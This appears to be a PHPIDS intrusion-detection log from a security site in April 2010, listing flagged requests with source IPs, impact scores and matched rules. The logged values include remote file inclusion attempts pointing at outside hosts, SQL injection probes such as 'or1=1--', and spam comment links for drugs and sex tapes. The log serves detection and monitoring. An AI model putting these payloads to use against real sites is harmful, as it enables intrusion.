Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121796
Name:REQUEST.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:20
Created:2010-04-20 02:54:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121797
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:20
Created:2010-04-20 02:54:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121798
Name:GET.page
Value:reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
Page:/i.php?page=reviews//include/html/config.php?DIR=http://www.sly8.com/sly8//adm/id/ver1?
IP:84.20.28.118
Impact:20
Created:2010-04-20 02:54:20
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121793
Name:REQUEST.codeme
Value:Perfect work, <a href= http://carrieprejeansextape.posterous.com/ >carrie prejean sex tape here</a>, [url= http://carrieprejeansextape.posterous.com/ ]carrie prejean sex tape here[/url], 37539,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 02:44:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121794
Name:POST.codeme
Value:Perfect work, <a href= http://carrieprejeansextape.posterous.com/ >carrie prejean sex tape here</a>, [url= http://carrieprejeansextape.posterous.com/ ]carrie prejean sex tape here[/url], 37539,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 02:44:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121791
Name:REQUEST.codeme
Value:Nise site, <a href= http://diovan.yolasite.com#1 >diovan here</a> [url=http://diovan.yolasite.com#1]diovan here[/url], 8-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-20 02:22:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:121792
Name:POST.codeme
Value:Nise site, <a href= http://diovan.yolasite.com#1 >diovan here</a> [url=http://diovan.yolasite.com#1]diovan here[/url], 8-(((,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-20 02:22:08
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:121789
Name:REQUEST.codeme
Value:Only, <a href= http://parishiltonsextape.posterous.com/ >Buy paris hilton sex tape</a>, [url= http://parishiltonsextape.posterous.com/ ]Buy paris hilton sex tape[/url], 062,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 01:59:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121790
Name:POST.codeme
Value:Only, <a href= http://parishiltonsextape.posterous.com/ >Buy paris hilton sex tape</a>, [url= http://parishiltonsextape.posterous.com/ ]Buy paris hilton sex tape[/url], 062,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 01:59:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121787
Name:REQUEST.codeme
Value:Thank You, <a href= http://percocet.yolasite.com#1 >percocet</a> [url=http://percocet.yolasite.com#1]percocet[/url], 58029,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 01:36:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121788
Name:POST.codeme
Value:Thank You, <a href= http://percocet.yolasite.com#1 >percocet</a> [url=http://percocet.yolasite.com#1]percocet[/url], 58029,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-20 01:36:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121785
Name:REQUEST.codeme
Value:Best Wishes, <a href= http://misscaliforniasextape.posterous.com/ >miss california sex tape</a>, [url= http://misscaliforniasextape.posterous.com/ ]miss california sex tape[/url], 8PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 01:14:37
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121786
Name:POST.codeme
Value:Best Wishes, <a href= http://misscaliforniasextape.posterous.com/ >miss california sex tape</a>, [url= http://misscaliforniasextape.posterous.com/ ]miss california sex tape[/url], 8PPP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 01:14:37
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121783
Name:REQUEST.codeme
Value:I like it so much, <a href= http://darvocet.yolasite.com >darvocet</a>, [url= http://darvocet.yolasite.com ]darvocet[/url], 2437,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-20 00:51:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121784
Name:POST.codeme
Value:I like it so much, <a href= http://darvocet.yolasite.com >darvocet</a>, [url= http://darvocet.yolasite.com ]darvocet[/url], 2437,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-20 00:51:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121779
Name:REQUEST.page
Value:security/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/login.php?dir=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:20
Created:2010-04-20 00:41:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121780
Name:REQUEST.page
Value:security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:20
Created:2010-04-20 00:41:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121781
Name:GET.page
Value:security/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/login.php?dir=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:20
Created:2010-04-20 00:41:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121782
Name:GET.page
Value:security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:20
Created:2010-04-20 00:41:53
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121777
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-04-20 00:32:28
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121778
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-04-20 00:32:28
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121775
Name:REQUEST.codeme
Value:What is it, <a href= http://kimkardashiansextapes.posterous.com/ >kim kardashian sex tape online</a>, [url= http://kimkardashiansextapes.posterous.com/ ]kim kardashian sex tape online[/url], 059446,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 00:28:59
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121776
Name:POST.codeme
Value:What is it, <a href= http://kimkardashiansextapes.posterous.com/ >kim kardashian sex tape online</a>, [url= http://kimkardashiansextapes.posterous.com/ ]kim kardashian sex tape online[/url], 059446,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-20 00:28:59
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121771
Name:REQUEST.page
Value:security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
IP:65.75.128.90
Impact:20
Created:2010-04-20 00:25:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121772
Name:REQUEST.page
Value:security/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/login.php?dir=http://phamsight.com/docs/images/head??
IP:65.75.128.90
Impact:20
Created:2010-04-20 00:25:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121773
Name:GET.page
Value:security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/cachecrack/login.php?dir=http://phamsight.com/docs/images/head??
IP:65.75.128.90
Impact:20
Created:2010-04-20 00:25:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121774
Name:GET.page
Value:security/login.php?dir=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/login.php?dir=http://phamsight.com/docs/images/head??
IP:65.75.128.90
Impact:20
Created:2010-04-20 00:25:00
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121769
Name:REQUEST.codeme
Value:Only, <a href= http://pamelaandersonsextape.posterous.com/ >pamela anderson sex tape now</a>, [url= http://pamelaandersonsextape.posterous.com/ ]pamela anderson sex tape now[/url], 501508,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-19 23:43:55
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121770
Name:POST.codeme
Value:Only, <a href= http://pamelaandersonsextape.posterous.com/ >pamela anderson sex tape now</a>, [url= http://pamelaandersonsextape.posterous.com/ ]pamela anderson sex tape now[/url], 501508,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-19 23:43:55
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:121767
Name:REQUEST.page
Value:backtrack-3-man/truecrypt0 order by 9999999--
Page:/i.php?page=backtrack-3-man/truecrypt0+order+by+9999999--
IP:137.101.192.15
Impact:6
Created:2010-04-19 23:33:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121768
Name:GET.page
Value:backtrack-3-man/truecrypt0 order by 9999999--
Page:/i.php?page=backtrack-3-man/truecrypt0+order+by+9999999--
IP:137.101.192.15
Impact:6
Created:2010-04-19 23:33:57
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:121765
Name:REQUEST.codeme
Value:best for you, <a href= http://bactrim.yolasite.com >Real bactrim</a>, [url= http://bactrim.yolasite.com ]Real bactrim[/url], 077,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-19 23:20:38
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121766
Name:POST.codeme
Value:best for you, <a href= http://bactrim.yolasite.com >Real bactrim</a>, [url= http://bactrim.yolasite.com ]Real bactrim[/url], 077,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-19 23:20:38
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:121739
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121740
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121741
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121742
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121743
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121744
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121745
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121746
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121747
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121748
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121749
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121750
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121751
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121752
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121753
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121754
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121755
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121756
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121757
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121758
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121759
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121760
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121761
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121762
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121763
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121764
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:30
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121713
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121714
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121715
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121716
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121717
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121718
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121719
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121720
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121721
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121722
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121723
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 23:03:29
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121724
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/i.php?page=reviews/reviews/i.php?page=hoosier
